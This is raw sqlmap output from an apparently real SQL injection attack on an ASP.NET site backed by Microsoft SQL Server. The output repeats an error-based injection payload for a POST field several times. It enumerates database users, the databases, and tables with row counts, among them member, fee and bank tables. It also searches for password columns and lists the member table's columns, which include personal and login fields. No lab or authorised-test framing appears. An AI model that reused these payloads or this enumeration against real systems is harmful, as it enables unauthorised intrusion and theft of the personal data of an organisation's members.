--- Parameter: textfield (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: textfield=aNIB'+(SELECT 'BZrt' WHERE 6983=6983 AND 7380=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7380=7380) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))))+'&imageField.x=1&imageField.y=1 --- web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 current user: 'usr_tma' current user is DBA: False database management system users [2]: [*] sa [*] usr_tma database management system users password hashes: [*] sa [1]: password hash: NULL [*] usr_tma [1]: password hash: NULL Database: db_tma +------------------------------------+---------+ | Table | Entries | +------------------------------------+---------+ | dbo.tblmkt_fixhistory | 690727 | | dbo.tblmkt_fix | 156464 | | dbo.tblmkt_fix_20150922 | 138446 | | dbo.tblmkt_fix_20150713 | 113983 | | dbo.tblmkt_fix_20150421 | 112229 | | dbo.tblmkt_fix_20130923 | 94418 | | dbo.tblmkt_fix_20130705 | 64130 | | dbo.tblCourse | 64058 | | dbo.tblCourse_20150929 | 62219 | | dbo.tblmkt_fix_20121224 | 58338 | | dbo.tblCourse_20140213 | 53987 | | dbo.tblCourse_20140124 | 53798 | | dbo.tblCourse_v1 | 53798 | | dbo.tblCourse_20130916 | 50453 | | dbo.tblCourse_20121224xxx | 47104 | | dbo.tblFee | 17409 | | dbo.tblFee_20121116 | 12595 | | dbo.CPT1 | 11321 | | dbo.tblMemberHistory | 8816 | | dbo.tblData | 6793 | | dbo.tblMemberRenew | 6459 | | dbo.tblMemberRenew_history | 4552 | | dbo.tblMemberHistory_20121218 | 3973 | | dbo.tblbank_intrate | 3658 | | dbo.tblMember | 3036 | | dbo.tblMember_20121218 | 2843 | | dbo.tblMember_20121224 | 2843 | | dbo.countDuplicateMemberId | 2739 | | dbo.tblmkt_fix_20120318 | 2532 | | dbo.tblCount | 1857 | | dbo.tblMemberRenew_20121218 | 1703 | | dbo.tblMemberRenew_20121218_notuse | 1703 | | dbo.tblMemberRenew_20121212 | 1691 | | dbo.tblEduct | 646 | | dbo.tblEduct_20121224 | 490 | | dbo.tblJob | 404 | | dbo.tblCPT | 257 | | dbo.tblNews | 185 | | dbo.tblBloomberg | 157 | | dbo.tblmkt_fixsetting | 143 | | dbo.tblmkt_fixsetting_20140916 | 111 | | dbo.tblmkt_fixsetting_20150713 | 111 | | dbo.tblComm | 100 | | dbo.tblbank_holiday | 89 | | dbo.tblmkt_fixsetting_20130705 | 84 | | dbo.tblPublication | 53 | | dbo.seed | 37 | | dbo.tblEventSection | 30 | | dbo.tblmkt_fixtyphoon_dtl | 23 | | dbo.tblUrl | 21 | | dbo.tblEventSession | 14 | | dbo.tblbank | 13 | | dbo.tblEvent | 12 | | dbo.tblGroup | 12 | | dbo.tblbank_intrate_config | 11 | | dbo.tblNB | 11 | | dbo.tblmkt_fixtyphoon | 10 | | dbo.tblConfig | 8 | | dbo.tblemailformat | 8 | | dbo.tblemailformat_20140113 | 8 | | dbo.tblemailformat_20140117 | 8 | | dbo.tblemailformat_20140121 | 8 | | dbo.tblemailformat_20141013 | 8 | | dbo.tblemailformat_20141124 | 8 | | dbo.tblemailformat_20151013 | 8 | | dbo.tblemailformat_20151113 | 8 | | dbo.tblRegForm | 8 | | dbo.tblemailformat_20121224 | 7 | | dbo.tblemailformat_20131209 | 7 | | dbo.tblemailformat_20131230 | 7 | | dbo.tblStatus | 5 | | dbo.tblstaff | 4 | | dbo.tblPMComm | 3 | | dbo.tblPubCat | 3 | | dbo.tblbank_staff | 2 | | dbo.tblAudit | 1 | | dbo.tblbank_intrate_typhoon | 1 | | dbo.tblbank_msg | 1 | | dbo.tblBg | 1 | | dbo.tblConsult | 1 | | dbo.tblGoverence | 1 | | dbo.tblMemberRenewSetting | 1 | | dbo.tblObj | 1 | | dbo.tblSys | 1 | +------------------------------------+---------+ Database: db_tma_20121217 +------------------------------------+---------+ | Table | Entries | +------------------------------------+---------+ | dbo.tblmkt_fixhistory | 471251 | | dbo.tblmkt_fix | 58141 | | dbo.tblCourse | 47000 | | dbo.tblFee | 12606 | | dbo.tblFee_20121116 | 12595 | | dbo.tblMemberHistory | 3966 | | dbo.tblMember | 2843 | | dbo.countDuplicateMemberId | 2739 | | dbo.tblmkt_fix_20120318 | 2532 | | dbo.tblbank_intrate | 2072 | | dbo.tblbank_intrate_history | 1910 | | dbo.tblCount | 1857 | | dbo.tblMemberRenew | 1703 | | dbo.tblMemberRenew_20121212 | 1691 | | dbo.tblCPT | 189 | | dbo.tblNews | 157 | | dbo.tblComm | 96 | | dbo.tblBloomberg | 85 | | dbo.tblmkt_fixsetting | 74 | | dbo.tblPublication | 36 | | dbo.seed | 35 | | dbo.tblEventSection | 30 | | dbo.tblUrl | 21 | | dbo.tblbank_holiday | 20 | | dbo.tblEventSession | 14 | | dbo.tblbank | 13 | | dbo.tblEvent | 12 | | dbo.tblGroup | 12 | | dbo.tblbank_intrate_config | 11 | | dbo.tblNB | 10 | | dbo.tblConfig | 8 | | dbo.tblRegForm | 8 | | dbo.tblemailformat | 6 | | dbo.tblStatus | 5 | | dbo.tblPMComm | 3 | | dbo.tblstaff | 3 | | dbo.tblbank_staff | 2 | | dbo.tblbank_intrate_typhoon | 1 | | dbo.tblbank_msg | 1 | | dbo.tblBg | 1 | | dbo.tblMemberRenewSetting | 1 | | dbo.tblSys | 1 | +------------------------------------+---------+ Database: msdb +------------------------------------+---------+ | Table | Entries | +------------------------------------+---------+ | dbo.backupfile | 207040 | | dbo.backupset | 103520 | | dbo.backupmediafamily | 103519 | | dbo.backupmediaset | 103519 | | dbo.syspolicy_configuration | 4 | +------------------------------------+---------+ columns LIKE 'pass' were found in the following databases: Database: master Table: sql_logins [1 column] +---------------+-----------+ | Column | Type | +---------------+-----------+ | password_hash | varbinary | +---------------+-----------+ Database: msdb Table: backupset [1 column] +-----------------------+ | Column | +-----------------------+ | is_password_protected | +-----------------------+ Database: msdb Table: backupmediaset [1 column] +-----------------------+------+ | Column | Type | +-----------------------+------+ | is_password_protected | bit | +-----------------------+------+ Database: msdb Table: backupset [1 entry] +-----------------------+ | is_password_protected | +-----------------------+ | 0 | +-----------------------+ Database: msdb Table: backupmediaset [1 entry] +-----------------------+ | is_password_protected | +-----------------------+ | 0 | +-----------------------+ sqlmap resumed the following injection point(s) from stored session: --- Parameter: textfield (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: textfield=aNIB'+(SELECT 'BZrt' WHERE 6983=6983 AND 7380=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7380=7380) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))))+'&imageField.x=1&imageField.y=1 --- web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 columns LIKE 'pass' were found in the following databases: Database: master Table: sql_logins [1 column] +---------------+-----------+ | Column | Type | +---------------+-----------+ | password_hash | varbinary | +---------------+-----------+ Database: msdb Table: backupset [1 column] +-----------------------+------+ | Column | Type | +-----------------------+------+ | is_password_protected | bit | +-----------------------+------+ Database: msdb Table: backupmediaset [1 column] +-----------------------+------+ | Column | Type | +-----------------------+------+ | is_password_protected | bit | +-----------------------+------+ Database: msdb Table: backupset [1 entry] +-----------------------+ | is_password_protected | +-----------------------+ | 0 | +-----------------------+ Database: msdb Table: backupmediaset [1 entry] +-----------------------+ | is_password_protected | +-----------------------+ | 0 | +-----------------------+ sqlmap resumed the following injection point(s) from stored session: --- Parameter: textfield (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: textfield=aNIB'+(SELECT 'BZrt' WHERE 6983=6983 AND 7380=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7380=7380) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))))+'&imageField.x=1&imageField.y=1 --- web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 available databases [11]: [*] db_betav1 [*] db_oldweb_tma [*] db_tma [*] db_tma_20121217 [*] db_tma_20121223 [*] db_tma_test [*] db_tma_test2 [*] master [*] model [*] msdb [*] tempdb sqlmap resumed the following injection point(s) from stored session: --- Parameter: textfield (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: textfield=aNIB'+(SELECT 'BZrt' WHERE 6983=6983 AND 7380=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7380=7380) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))))+'&imageField.x=1&imageField.y=1 --- web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 Database: db_tma Table: tblMember [50 columns] +--------------------+ | Column | +--------------------+ | Member2Addr1 | nvarchar | | MemberACIDC | nvarchar | | MemberACIDCYear | nvarchar | | MemberACIDip | nvarchar | | MemberACIDipYear | nvarchar | | MemberACIM | nvarchar | | MemberACIQuali | nvarchar | | MemberACISC | nvarchar | | MemberACISCYear | nvarchar | | MemberAddr1 | nvarchar | | MemberAddr2 | nvarchar | | MemberAddr3 | nvarchar | | MemberCease | nvarchar | | MemberCName | nvarchar | | MemberCollege | nvarchar | | MemberContactTel | nvarchar | | MemberCreateDate | datetime | | Memberdisclosure | char | | MemberDOJ | nvarchar | | MemberEmail | nvarchar | | MemberExpectGrad | datetime | | MemberField | nvarchar | | MemberFName | nvarchar | | MemberFullName | nvarchar | | MemberId | int | | MemberInst | | MemberLName | nvarchar | | MemberLogin | nvarchar | | MemberMajor | | MemberMTel | | MemberPosition | nvarchar | | MemberProposer | nvarchar | | MemberProposerInst | nvarchar | | MemberPwd | nvarchar | | MemberRenewal | nvarchar | | MemberRenewAlert | | MemberRmk | nvarchar | | MemberSeconder | | MemberSeconderInst | nvarchar | | MemberSex | nvarchar | | MemberStatus | | MemberStudentId | nvarchar | | MemberStudyForm | datetime | | MemberStudyTo | datetime | | MemberTel | nvarchar | | MemberTitle | | MemberTMACDSYear | | MemberTMC | nvarchar | | MemberTMCYear | | OldMemberGroup | +--------------------+